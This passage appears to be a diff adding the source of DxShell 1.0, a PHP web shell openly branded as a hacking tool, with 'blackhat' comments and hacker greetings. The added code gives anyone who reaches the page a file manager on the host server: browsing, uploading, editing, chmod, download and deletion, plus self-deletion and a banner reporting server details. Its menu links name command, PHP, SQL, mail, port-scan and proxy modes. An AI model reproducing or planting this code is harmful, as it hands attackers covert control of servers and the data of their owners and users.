			DxSetCookie($val['NAM'], $val['VAL'], time()+60*60*24*10);
+			}
+			else DxSetCookie($name, $val, (empty($val))?1:(time()+60*60*24*10));
+		}
+	DxGotoURL(DxURL('leave', 'dxmode'));
+	die();
+	}
+
+if (isset($_GET['dxinstant']))
+	{
	$_GET['dxinstant']=strtoupper($_GET['dxinstant']);
+	if ($_GET['dxinstant']=='DEL')
+		{
+		$ok=@unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));
+		print '<script>window.alert("SELF '.(  ($ok)?'deleted. Reload the page to believe me =)':'tried to delete but was unsuccessful'  ).'");</script>';
+		}
+	}
+
+function DxObGZ($s) {return gzencode($s);}
+
+if (isset($DxDOWNLOAD_File))
+	{/* File downloader for everything */
+	if (!$DXGLOBALSHIT)
+		{
+		if ($GLOB['SYS']['GZIP']['CanOutput'])
+			{
+			ini_set('output_buffering',4096);
+			ob_start("DxObGZ");
+			header('Content-Encoding: gzip');
+			}
		for ($i=0; $i<count($DxDOWNLOAD_File['headers']); $i++) header($DxDOWNLOAD_File['headers'][$i]);
+		print $DxDOWNLOAD_File['content'];
+		die();
+		}
+	/* if u want to download file when $DXGLOBALSHIT, scroll down */
+	}
+
+###################################################################################
+####################++++++++++++++# M A I N #++++++++++++++++++####################
+###################################################################################
+if (!in_array($_GET['dxmode'], array_keys($GLOB['DxMODES']))) die(DxError('Unknown $_GET[\'dxmode\']! check $GLOB[\'DxMODES\'] array'));
+
+########
+########   Main HAT (blackhat? =))) )
+########
+if (!in_array($_GET['dxmode'], array_keys($GLOB['DxMODES']))) die('Unknown $_GET[\'dxmode\']');
+
+if ($DXGLOBALSHIT)
+	print str_repeat("\n", 20).'<!--SHELL HERE-->';
+?>
+<html><head><title><?=$_SERVER['HTTP_HOST'];?> --= DxShell 1.0 - by o_O Tync =-- :: <?=$GLOB['DxMODES'][$_GET['dxmode']];?></title>
+<Meta Http-equiv="Content-Type" Content="text/html; Charset=windows-1251">
+<link rel="shortcut icon" href="<?=DxURL('kill','dxmode');?>&dxmode=IMG&dximg=DxS">
+<style>
+img	 {border-width:0pt;}
+body, td 		{font-size: 10pt; color: #00B000; background-color: #000000; font-family: Arial;padding:2pt;margin:2pt; vertical-align:top;}
+h1				{font-size: 14pt; color: #00B000; background-color: #002000; font-family: Arial Black; font-weight: bold; text-align: center;}
+h2				{font-size: 12pt; color: #00B000; background-color: #002000; font-family: Courier New; text-align: center;}
+h3				{font-size: 12pt; color: #F0F000; background-color: #002000; font-family: Times New Roman; text-align: center;}
+caption			{font-size: 12pt; color: #00FF00; background-color: #000000; font-family: Times New Roman; text-align:center; border-width: 1pt 3pt 1pt 3pt;border-color:#FFFF00;border-style:solid solid dotted solid;padding: 5pt 0pt;}
+td.h2_oneline	{font-size: 12pt; color: #00B000; font-family: Courier New; text-align: center;background-color: #002000; border-right-color:#00FF00;border-right-width:1pt;border-right-style:solid;vertical-align:middle;}
+td.mode_header	{font-size: 16pt; color: #FFFF00; font-family: Courier New; text-align: center;background-color: #002000; vertical-align:middle;}
+table.outset, td.outset	  {border-width:3pt; border-style:outset; border-color: #004000;margin-top: 2pt;vertical-align:middle;}
+table.bord, td.bord, fieldset   {border-width:1pt; border-style:solid; border-color: #003000;vertical-align:middle;}
+hr   {border-width:1pt; border-style:solid; border-color: #005000; text-align: center; width: 90%;}
+textarea.bout 		{border-color: #000000; border-width:0pt; background: #000000; font: 12px verdana, arial, helvetica, sans-serif; color: #00FF00; Scrollbar-Face-color:#000000;Scrollbar-Track-Color: #000000;}
+td.listing	{background-color: #000500; font-family: Courier New; font-size:8pt; color:#00B000; border-color: #003000;border-width:1pt; border-style:solid; border-collapse:collapse;padding:0pt 3pt;vertical-align:top;}
+td.linelisting  {background-color: #000500; font-family: Courier New; font-size:8pt; color:#00B000; border-color: #003000;border-width:1pt 0pt; border-style:solid; border-collapse:collapse;padding:0pt 3pt;vertical-align:middle;}
+table.linelisting {border-color: #003000;border-width:0pt 1pt; border-style:solid;}
+td.js_floatwin_header {background-color:#003300;font-size:10pt;font-weight:bold;color:#FFFF00;border-color: #00FF00;border-width:1pt; border-style:solid;border-collapse:collapse;}
+td.js_floatwin_body	  {background-color:#000000;font-size:10pt;color:#00B000;border-color: #00FF00;border-width:1pt; border-style:solid;border-collapse:collapse;}
+font.rwx_sticky_bit {color:#FF0000;}
+.highlight_txt		{color: #FFFF00;}
+.achtung			{color: #000000; background-color: #FF0000; font-family: Arial Black; font-size: 14pt; padding:0pt 5pt;}
+
+input 			{font-size: 10pt;font-family: Arial; color: #E0E000; background-color: #000000; border-color:#00FF00 #005000 #005000 #FFFF00; border-width:1pt 1pt 1pt 3pt;border-style:dotted dotted dotted solid; padding-left: 3pt;overflow:hidden;}
+input.radio		{border-width:0pt;color: #FFFF00;}
+input.submit 	{font-size: 12pt;font-family: Impact, Arial Black; color :#00FF00; background-color: #002000; border-color: #00FF00; border-width:0pt 1pt 1pt 0pt; border-style: solid; padding:1pt;letter-spacing:1pt;padding:0pt 2pt;}
+input.bt_Yes 	{font-size: 14pt;font-family: Impact, Arial Black; color :#00FF00; background-color: #005000; border-color: #005000 #005000 #00FF00 #005000; border-width:1pt 1pt 2pt 1pt; border-style: dotted dotted solid dotted; height: 30pt; padding:10pt; margin: 5pt 10pt;}
+input.bt_No 	{font-size: 14pt;font-family: Impact, Arial Black; color :#FF0000; background-color: #500000; border-color: #500000 #500000 #FF0000 #500000; border-width:1pt 1pt 2pt 1pt; border-style: dotted dotted solid dotted; height: 30pt; padding:10pt; margin: 5pt 10pt;}
+input.bt_Yes:Hover 	{color:#000000; background-color:#00FF00;border-bottom-color:#FFFFFF;}
+input.bt_No:Hover 	{color:#000000; background-color:#FF0000;border-bottom-color:#FFFFFF;}
+textarea 		{color:#00FF00; background-color:#001000;border-color:#000000;border-width:0pt;border-style:solid;font-size:10pt;font-family:Arial;Padding:5pt;
+				Scrollbar-Face-Color: #00FF00; Scrollbar-Track-Color: #000500;
+				Scrollbar-Highlight-Color: #00A000;	Scrollbar-3dlight-Color: #00A000; Scrollbar-Shadow-Color: #005000;
+				Scrollbar-Darkshadow-Color: #005000;}
+select			{background-color:#001000;color:#00D000;border-color:#D0D000;border-width:1pt;border-style:solid dotted dotted solid;}
+
+A:Link, A:Visited { color: #00D000;	text-decoration: underline; }
+A.no:Link, A.no:Visited { color: #00D000;	text-decoration: none; }
+A:Hover, A:Visited:Hover , A.no:Hover, A.no:Visited:Hover { color: #00FF00; background-color:#003300; text-decoration: overline; }
+.Hover:Hover {color: #FFFF00; cursor:help;}
+.HoverClick:Hover {color: #FFFF00; cursor:crosshair;}
+span.margin		{margin: 0pt 10pt;}
+td.error {color:#000000; background-color: #FF0000; font-weight: bold; font-size: 11pt;}
+td.warning {color:#000000; background-color: #D00000; font-size: 11pt;}
+font.img_replacer {margin:1pt;padding:1pt;text-decoration: none;border-width:1pt;border-color:#D0D000;border-style:solid;}
+</style>
+
+<?php
+if (in_array($_GET['dxmode'], array('UPL', 'DIR', 'PRT')))
+	{  /* THIS FLOATING WINDOW IS ONLY SET FOR MODES: */
?>
+<SCRIPT>
+var dom = document.getElementById?1:0;
+var ie4 = document.all && document.all.item;
+var opera = window.opera; //Opera
+var ie5 = dom && ie4 && !opera;
+var nn4 = document.layers;
+var nn6 = dom && !ie5 && !opera;
+var vers=parseInt(navigator.appVersion);
+var good_browser = (ie5 || ie4);
+function showwin(hdr,txt,w,vis)
+{
+if(good_browser)
+	{
+	var obj =  document.all('js_floatwin');
+	var evnt = event;
+	var xOffset = document.body.scrollLeft;
+	var yOffset = document.body.scrollTop;
+
+	var temp =
+	"<TABLE BORDER=0 CELLSPACING=0 CELLPADDING=0 WIDTH="+ w +">"
+	+((hdr!='')?("<TR><TD class=js_floatwin_header>"+ hdr + "</TD></TR>"):"")
+	+"<TR><TD class=js_floatwin_body>" + txt + "</TD></TR>"
+	+"</TABLE>";
+
+	if (vis == 1)
+		{
+		obj.innerHTML = temp;
+		obj.style.width = w;
+		hor = document.body.scrollWidth - obj.offsetWidth;
+		posHor = xOffset + evnt.clientX + 10;
+		posHor2 = xOffset + evnt.clientX - obj.offsetWidth - 5;
+		posVer = yOffset + evnt.clientY - obj.offsetHeight - 5;
+
+		if (posHor<hor)
+			obj.style.posLeft = posHor
+		else
+			obj.style.posLeft = posHor2;
+
+		obj.style.posTop = posVer;
+
+		obj.style.visibility = "visible";
+		}
+		else
+		{
+		obj.style.visibility = "hidden";
+		obj.style.posTop = 0;
+		obj.style.posLeft = 0;
+		}
+	}
+}
+function movewin()
+{
+if (good_browser)
+	{
+	var obj =  document.all('js_floatwin');
+	var evnt = event;
+	var xOffset = document.body.scrollLeft;
+	var yOffset = document.body.scrollTop;
+
+	hor = document.body.scrollWidth - obj.offsetWidth;
+	posHor = xOffset + evnt.clientX + 10;
+	posHor2 = xOffset + evnt.clientX - obj.offsetWidth - 5;
+	posVer = yOffset + evnt.clientY - obj.offsetHeight - 5;
+
+	if (posHor<hor)
+		obj.style.posLeft = posHor
+		else
+		obj.style.posLeft = posHor2;
+
+	obj.style.posTop = posVer;
+	}
+}
+</SCRIPT>
+<?php } /* /END */?>
+
+</head>
+<body>
+<?php
+if ($DXGLOBALSHIT) /* tries to kill all the fucking bug.php pre-output, if ob_clean() failed */
+	{
	print str_repeat("\n", 10).'<!--SHIT KILLER-->';
+	print "\n".'</body></a>'.str_repeat('</table>', 5).str_repeat('</div>', 5).str_repeat('</span>', 5).str_repeat('</pre>', 1).str_repeat('</font>', 5).str_repeat('</script>', 2);
+	print "\n".'<TABLE WIDTH=100% BORDER=0  style="position:absolute;z-index:100;top:0pt;left:0pt;width:100%;height:100%;"><tr><td>';
+	print "\n\n\n\n";
+	}
+?>
+
+<div id="js_floatwin" style="z-index:50;position:absolute;left:0;top:0;visibility:hidden"></div>
+<table width=100% cellspacing=0 cellpadding=0 class=outset>
+<tr>
+	<td width=100pt class=h2_oneline><a href="<?=DxURL('kill', '');?>&dxmode=WTF" class=no><h1>DxShell<br>v<?=$GLOB['SHELL']['Ver'];?></td>
+	<td>
+<?php
+print "\n".'<div style="margin-right:'.(  ((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2)?'100':'30'  ).'pt;">';
+print "\n".(  ($DXGLOBALSHIT)?'<font color=#FF0000><b>GLOBALSHIT</b></font> ; ':''  );
+print "\n".DxPrint_ParamState('php_ver', 		phpversion()						).' ; ';
+print "\n".DxPrint_ParamState('php_Safe_Mode', 	$GLOB['PHP']['SafeMode'], '!'		).' ; ';
+print "\n".DxPrint_ParamState('magic_quotes', 	(bool)get_magic_quotes_gpc(), '!'	).' ; ';
+print "\n".DxPrint_ParamState('gZip', 			function_exists('gzencode')			).' ; ';
+print "\n".DxPrint_ParamState('cURL', 			function_exists('curl_version')		).' ; ';
+print "\n".DxPrint_ParamState('MySQL', 			function_exists('mysql_connect')	).' ; ';
+print "\n".DxPrint_ParamState('MsSQL', 			function_exists('mssql_connect')	).' ; ';
+print "\n".DxPrint_ParamState('PostgreSQL', 	function_exists('pg_connect')		).' ; ';
+print "\n".DxPrint_ParamState('Oracle', 		function_exists('ocilogon')			).' ; ';
+print "\n".'Disabled functions: '.((($df=@ini_get('disable_functions'))=='')?'<font color=#00FF00><b>NONE</b></font>':'<font color=#FF0000><b>'.str_replace(array(',',';'), ', ', $df).'</b></font>');
+print "\n".'</div>';
+
+print "\n\n".'<span align=right style="position:absolute;z-index:1;right:0pt;top:0pt;"><table><tr><td class="h2_oneline"><nobr>';
+if ((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2)
+	print "\n".'<a href="'.DxURL('kill', 'dxinstant').'&dxinstant=logoff" title="Log Off" class=no>[Exit]</a>';
+print "\n".'<a href="'.DxURL('kill', 'dxinstant').'&dxinstant=DEL" title="Delete self ('.basename($_SERVER['PHP_SELF']).')" class=no><font color=#FF0000;>'.DxImg('del').'</font></a>';
+print "\n".'</nobr></td></tr></table></span>';
+
+print "\n\n".'<hr>';
+print "\n".'Disk free: <b>'.DxStr_FmtFileSize(disk_free_space($GLOB['FILES']['CurDIR'])).' / '.DxStr_FmtFileSize(disk_total_space($GLOB['FILES']['CurDIR'])).'</b> ; ';
+print "\n".'OS: <b>'.$GLOB['SYS']['OS']['id'].' ('.$GLOB['SYS']['OS']['Full'].' )</b> ; ';
+print "\n".'Yer_IP: <b>'.@$_SERVER['REMOTE_ADDR'].' ('.@$_SERVER['REMOTE_HOST'].')</b> ; ';
+print "\n".'<nobr>Own/U/G/Pid/Inode:<wbr><b>'.get_current_user().' / '.getmyuid().' / '.getmygid().' / '.getmypid().' / '.getmyinode().'</b> ; </nobr>';
+print "\n".'MySQL : <b>'.@mysql_get_server_info().'</b> ; ';
+print "\n".'<br>'.@$_SERVER['SERVER_SOFTWARE'];
+?>
+	</td>
+</table>
+<table width=100% cellspacing=0 cellpadding=0 class=outset>
+<tr>
+	<td width=100pt class=h2_oneline><h2>Modes</td>
+	<td style="text-align:center;"><nobr>
+	<a href="<?=DxURL('kill', '');?>&dxmode=DIR">DIR</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=F_VIEW">VIEW</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=FTP<?=((!empty($_GET['dxdir']))?'&dxdir='.$_GET['dxdir']:'');?>">FTP</a>
+	<td><font class=highlight_txt><big><b>II</td><td style="text-align:center;"><nobr>
+	<a href="<?=DxURL('leave', 'dxsql_s,dxsql_l,dxsql_p,dxsql_d');?>&dxmode=SQL">SQL</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=PHP">PHP</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=COOK">COOKIE</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=CMD">CMD</a>
+	<td><font class=highlight_txt><big><b>II</td><td style="text-align:center;"><nobr>
+	<a href="<?=DxURL('kill', '');?>&dxmode=MAIL">MAIL</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=STR">STR</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=PRT">PORTSCAN</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=SOCK">SOCK</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=PROX">PROXY</a>
+	</td>
+	</tr>
+</table>
+
+<?php $DX_Header_drawn=true; ?>
+
+<?php
+#################################################
+########
+########   DXGLOBALSHIT DOWNLOADER
+########
+if (isset($DxDOWNLOAD_File)) /* only when DXGLOBALSHIT is enabled */
+	{
	print "\n".'<table align=center><tr><td class=mode_header><b>Download file</td></tr></table>';
+	print "\n".'The fact you see this means that "'.basename($_SERVER['PHP_SELF']).'" has fucked up the output with it\'s shit, so no headerz could be sent =((';
+	print "\n".'<br>Exclusively, DxShell is proud to present an additional way to download files...Just execute the php-script given below, and it will make the file u\'re trying to download';
+
+	if ($GLOB['SYS']['GZIP']['CanUse'])  $DxDOWNLOAD_File['content']=gzcompress($DxDOWNLOAD_File['content'], 6);
+
+	print "\n\n".'<br><br>';
+	print "\n".'<textarea rows=30 style="width:90%" align=center>';
+	print "\n".'<?php'."\n".' //Execute this, and you\'ll get the requested "'.$DxDOWNLOAD_File['filename'].'" in the same folder with the script ;)';
+	print "\n".'// The file is '.(  ($GLOB['SYS']['GZIP']['CanUse'])?'gzcompress()ed and':''  ).' base64_encode()ed';
+	print "\n\n".'$encoded_file=\''.base64_encode($DxDOWNLOAD_File['content']).'\';';
+	print "\n\n\n\n";
+	print "\n".'$f=fopen(\''.$DxDOWNLOAD_File['filename'].'\', \'w\');';
+	print "\n".'fputs($f, '.(  ($GLOB['SYS']['GZIP']['CanUse'])?'gzuncompress(base64_decode($encoded_file))':'base64_decode($encoded_file)'  ).');';
+	print "\n".'fclose($f);';
+	print "\n".'//Yahoo, hacker, the file is here =)';
+	print "\n".'?>';
+	print "\n".'</textarea>';
+	die();
+	}
+
+?>
+
+<table align=center>
+	<tr><td class=mode_header>
+	@MODE: <b><?=$GLOB['DxMODES'][$_GET['dxmode']];?>
+	</td></tr></table>
+<?
+
+########
+########   AboutBox
+########
+if ($_GET['dxmode']=='WTF')
+	{
+	?>
+<table align=center class=nooooneblya><tr><td><div align=center>
+<?php
+print '<a href="http://hellknights.void.ru/">'.DxImg('exec').'</a>';
+print '<br>o_O Tync, ICQ# 1227-700';
+?><br><br>
+<textarea name="LolBox" class=bout style="width:500pt; height:500pt;"></textarea></table>
+<SCRIPT language=Javascript><!--
+var tl=new Array(
+"Kilobytes of c0de, litres of beer, kilometers of cigarettes (*no drugs*), and for what purpose?",
+"What's wrong with other shells?",
+"Usability, functionality, bugs?... NO.",
+"The main bug is: these shells ARE NOT mine =)",
+"Just like to be responsible for every motherfucking byte of code.",
+"Enjoy!",
+"-----------------------------------",
+"o_O Tync, http://hellknights.void.ru/, ICQ# 1227-700",
+"DxShell v<?=$GLOB['SHELL']['Ver'].', date '.$GLOB['SHELL']['Date'];?>",
+"",
+"Greetz to: ",
+"iNfantry the Ruler",
+"Nik8 the Hekker",
+"_1nf3ct0r_ the Father",
+"Industry of Death the betatest0r =)",
+"",
+"Thanks to:",
+"Dunhill the cigarettes, Tuborg the beer, PHP the language, Nescafe the Coffee, Psychedelic the Music",
+"",
+"Wartime testers & debuggers ::: =))) :::",
+"MINDGROW",
+"BELLFAGOR",
+"",
+"",
+"Hekk da pl0net!",
+"--- EOF ---"
+);
+var speed=40;var index=0; text_pos=0;var str_length=tl[0].length;var contents, row;
+function type_text()
+{
contents='';row=Math.max(0,index-50);
+while(row<index) contents += tl[row++] + '\r\n';
+document.getElementById("LolBox").value = contents + tl[index].substring(0,text_pos)+'|';
+if(text_pos++==str_length)
+	{text_pos=0;index++;
+	if(index!=tl.length)
+	{str_length=tl[index].length;setTimeout("type_text()",1000);
+	}
+	} else setTimeout("type_text()",speed);
+}type_text();
+//-->
+</SCRIPT>
+	<?php
+	}
+
+
+		###################################
+
+########
+########   Upload file
+########
+if ($_GET['dxmode']=='UPL')
+	{
+	if (empty($_POST['dxdir']) AND empty($_GET['dxdir'])) die(DxError('Uploading without selecting directory $_POST/$_GET[\'dxdir\'] is restricted'));
+
+	if (isset($_FILES['dx_uplfile']['tmp_name']))
+		{
+		$GETFILE=file_get_contents($_FILES['dx_uplfile']['tmp_name']);
+		DxFiles_UploadHere($_POST['dxdir'], $_FILES['dx_uplfile']['name'], $GETFILE);
+		}
+		else
+		{
+		print "\n".'<form action="'.DxURL('leave','dxmode,dxsimple').'" enctype="multipart/form-data" method=POST>';
+		print "\n".'<input type="hidden" name="MAX_FILE_SIZE" value="'.$GLOB['PHP']['upload_max_filesize'].'">';
+		print "\n".'<font class="highlight_txt">Max: '.DxStr_FmtFileSize($GLOB['PHP']['upload_max_filesize']).'</font>';
+		print "\n".'<br><input type=text name="dxdir" value="'.$_GET['dxdir'].'" SIZE=50>';
+		print "\n".'<br><input type=file name="dx_uplfile" SIZE=50>';
+		print "\n".'<input type=submit value="Upload" class="submit"></form>';
+		}
+	}
+
+		###################################
+
+########
+########   Directory listings
+########
+if ($_GET['dxmode']=='DIR')
+	{
+	if (empty($_GET['dxdir'])) $_GET['dxdir']=realpath($GLOB['FILES']['CurDIR']);
+	$_GET['dxdir']=DxFileOkaySlashes($_GET['dxdir']);
+	if (substr($_GET['dxdir'], -1,1)!='/') $_GET['dxdir'].='/';
+
+	print "\n".'<br><form action="'.DxURL('kill', '').'" method=GET style="display:inline;">';
+	DxGETinForm('leave', 'dxmode');
+	print "\n".'<input type=text name="dxdir" value="'.DxFileOkaySlashes(realpath($_GET['dxdir'])).'" SIZE=40>';
+	print "\n".'<input type=submit value="Goto" class="submit"></form>';
+
+	print "\n".'<br>'.'<b>&gt;&gt; <b>'.$_GET['dxdir'].'</b>';
+	if (!file_exists($_GET['dxdir'])) die(DxError('No such directory'));
+	if (!is_dir($_GET['dxdir'])) 	  die(DxError('It\'s a file!! What do you think about listing files in a file? =)) '));
+
+	if (isset($_GET['dxparam']))
+		{
		if ($_GET['dxparam']=='mkDIR')  if (	!mkdir($_GET['dxdir'].'__DxS_NEWDIR__'.DxRandomChars(3))	) DxError('Unable to mkDir. Perms?');
+		if ($_GET['dxparam']=='mkFILE') if (	!touch($_GET['dxdir'].'__DxS_NEWDIR__'.DxRandomChars(3))	) DxError('Unable to mkFile. Perms?');
+		}
+
+	if (!($dir_ptr=opendir($_GET['dxdir']))) die(DxError('Unable to open dir for reading. Perms?...'));
+	$FILES=array('DIRS' => array(), 'FILES' => array());
+	while (!is_bool( $file = readdir($dir_ptr)  ) )
+		if (($file!='.') and ($file!='..'))		if (is_dir($_GET['dxdir'].$file)) $FILES['DIRS'][]=$file; else $FILES['FILES'][]=$file;
+	asort($FILES['DIRS']);asort($FILES['FILES']);
+
+	print "\n".'<span style="position:absolute;right:0pt;">';
+	if (isset($_GET['dxdirsimple']))	print '<a href="'.DxURL('kill', 'dxdirsimple').'">[Switch to FULL]</a>';
+		else					print '<a href="'.DxURL('leave', '').'&dxdirsimple=1">[Switch to LITE]</a>';
+	print '</span>';
+
+	$folderup_link=explode('/',$_GET['dxdir'].'../');
+	if (!empty($folderup_link[   count($folderup_link)-3   ]) AND ($folderup_link[   count($folderup_link)-3   ]!='..'))
+		unset($folderup_link[   count($folderup_link)-3   ], $folderup_link[   count($folderup_link)-1   ]);
+	$folderup_link=implode('/', $folderup_link);
+	print "\n".str_repeat('&nbsp;',3).'<a href="'.DxURL('leave', 'dxdirsimple').'&dxmode=DIR&dxdir='.$folderup_link.'" class=no>'
+						.DxImg('foldup').' ../</a>';
+
+	print "\n".str_repeat('&nbsp;', 15).'<font class=highlight_txt>MAKE: </font>'
+		.'<a href="'.DxURL('leave', 'dxmode,dxdir,dxdirsimple').'&dxparam=mkDIR">Dir</a>'
+		.' / '
+		.'<a href="'.DxURL('leave', 'dxmode,dxdir,dxdirsimple').'&dxparam=mkFILE">File</a>'
+		.' / '.str_repeat('&nbsp;',5)
+		.'<font class=highlight_txt>UPLOAD: </font>'
+		.'<a href="'.DxURL('leave', 'dxdirsimple').'&dxdir='.DxFileToUrl($_GET['dxdir']).'&dxmode=UPL">Form</a>'
+		.' / '
+		.'<a href="'.DxURL('leave', 'dxdirsimple').'&dxdir='.DxFileToUrl($_GET['dxdir']).'&dxmode=UPL">FTP</a>'
+		;
+
+	print "\n".'<br>'.count($FILES['DIRS']).' dirs, '.count($FILES['FILES']).' files ';
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 ><COL span=15 class="linelisting">';
+	for ($NOWi=0;$NOWi<=1;$NOWi++)
+		for ($NOW=($NOWi==0)?'DIRS':'FILES', $i=0;$i<count($FILES[$NOW]);$i++)
+			{
			$cur=&$FILES[$NOW][$i];
+			$dircur=$_GET['dxdir'].$cur;
+			print "\n".'<tr>';
+			print "\n\t".'<td class=linelisting '.((isset($_GET['dxdirsimple']) AND ($NOW=='DIRS'))?'colspan=2':'').'>'
+							.(($NOW=='DIRS')?DxImg('folder').' '
+							.				 '<a href="'.DxURL('leave', 'dxdirsimple').'&dxmode=DIR&dxdir='.DxFileToUrl($dircur).'" class=no>':'')
+							.(($NOW=='FILES')?'<a href="'.DxURL('kill', '').'&dxmode=F_VIEW&dxfile='.DxFileToUrl($dircur).'" class=no>':'')
+							.htmlspecialchars($cur).'</td>';
+
+			if (!isset($_GET['dxdirsimple']))
+				{
+				print "\n\t".'<td class=linelisting>'
+					.'<span '.DxDesign_DrawBubbleBox('File Info',    '<b>Create time:</b><br>'.DxDate(@filectime($dircur)).'<br>'
+															 		.'<b>Modify time:</b><br>'. DxDate(@filemtime($dircur)).'<br>'
+															 		.'<b>Owner/Group:</b><br>'.(@fileowner($dircur)).' / '.(@filegroup($dircur))
+															 		, 150).' class=Hover><b>INFO</span> </td>';
+				print "\n\t".'<td class=linelisting '.(($NOW=='DIRS')?'colspan=2':'').'>'
+					.((($i+$NOWi)==0)?'<span '.DxDesign_DrawBubbleBox('Perms legend', '1st: sticky bit:<br>"<b>S</b>" Socket, "<b>L</b>" Symbolic Link, "<b>&lt;empty&gt;</b>" Regular, "<b>B</b>" Block special, "<b>D</b>" Directory, "<b>C</b>" Character special, "<b>P</b>" FIFO Pipe, "<b>?</b>" Unknown<br>Others: Owner/Group/World<br>"<b>r</b>" Read, "<b>w</b>" Write, "<b>x</b>" Execute<br><br><b>Click to CHMOD', 400).' class=Hover>':'')
+					.'<a href="'.DxURL('kill', '').'&dxmode=F_CHM&dxfile='.DxFileToUrl($dircur).'" class=no>'.DxChmod_Oct2Str(@fileperms($dircur)).'</td>';
+				}
+
+			if ($NOW!='DIRS') print "\n\t".'<td class=linelisting style="text-align:right;">'.DxStr_FmtFileSize(@filesize($dircur)).'</td>';
+
+			if (!isset($_GET['dxdirsimple']))
+				{
+				if ($NOW=='DIRS') print "\n\t".'<td class=linelisting colspan='.(($GLOB['SYS']['GZIP']['IMG'])?'4':'3').'>&nbsp;</td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($dircur).'" target=_blank>'.DxImg('view').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_ED&dxfile='.DxFileToUrl($dircur).'">'.DxImg('ed').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($dircur).'">'.DxImg('downl').'</a></td>';
+				if (($NOW!='DIRS') AND ($GLOB['SYS']['GZIP']['IMG'])) print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dx_gzip=Yeah&dxfile='.DxFileToUrl($dircur).'">'.DxImg('gzip').'</a></td>';
+				print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_REN&dxfile='.DxFileToUrl($dircur).'">'.DxImg('rename').'</a></td>';
+				print "\n\t".'<td class=linelisting '.(($NOW=='DIRS')?'colspan=3':'').'><a href="'.DxURL('kill', '').'&dxmode=F_DEL&dxfile='.DxFileToUrl($dircur).'">'.DxImg('del').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_COP&dxfile='.DxFileToUrl($dircur).'">'.DxImg('copy').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_MOV&dxfile='.DxFileToUrl($dircur).'">'.DxImg('move').'</a></td>';
+				}
+			print "\n\t".'</tr>';
+			}
+	print "\n".'</table>';
+	}
+
+
+########
+########   File Global Actions
+########
+if ('F_'==substr($_GET['dxmode'],0,2))
+	{
	if (empty($_GET['dxfile']))
+		{
		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', '');
+		print "\n".'<input type=text name="dxfile" value="" style="width:70%;">';
+		print "\n".'<br><input type=submit value="Select" class="submit">';
+		print "\n".'</form>';
+		}
+	if (!file_exists(@$_GET['dxfile']))  die(DxError('No such file'));
+	print "\n\n".'<a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])).'">[Go DIR]</a>';
+	}
+
+########
+########   File CHMOD
+########
+if ($_GET['dxmode']=='F_CHM')
+	{
+	if (isset($_GET['dxparam']))
+		{
		if (chmod($_GET['dxfile'], octdec((int)$_GET['dxparam']))==FALSE)
+			print DxError('Chmod "'.$_GET['dxfile'].'" failed');
+			else print 'CHMOD( <font class=highlight_txt>'.$_GET['dxfile'].'</b></font> )...<b>OK</b>';
+		}
+		else
+		{
		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', 'dxmode,dxfile');
+		print "\n".'CHMOD( <font class=highlight_txt>'.$_GET['dxfile'].'</font> )';
+		print "\n".'<br><input type=text name="dxparam" value="'.
+			//decoct(fileperms($_GET['dxfile']))
+			substr(sprintf('%o', fileperms($_GET['dxfile'])), -4)
+			.'">';
+		print "\n".'<input type=submit value="chmod" class="submit"></form>';
+		}
+	}
+
+########
+########   File View
+########
+if ($_GET['dxmode']=='F_VIEW')
+	{
+	if (!is_file($_GET['dxfile']))  	die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) '));
+	if (!is_readable($_GET['dxfile']))  die(DxError('File is not readable. Perms?...'));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 align=right><tr>';
+	print "\n".'<td><h3>'.$_GET['dxfile'].'</h3></td>';
+	print "\n".'<td>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($_GET['dxfile']).'" target=_blank>'.DxImg('view').'</a>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_ED&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('ed').'</a>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('downl').'</a>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_DEL&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('del').'</a>'
+		.'</td>';
+	print "\n".'</tr></table><br>';
+	print "\n".'Tip: to view the file "as is" - open the page in <a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($_GET['dxfile']).'">source</a> (<i>works best in Opera</i>), or <a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($_GET['dxfile']).'">download</a> this file';
+
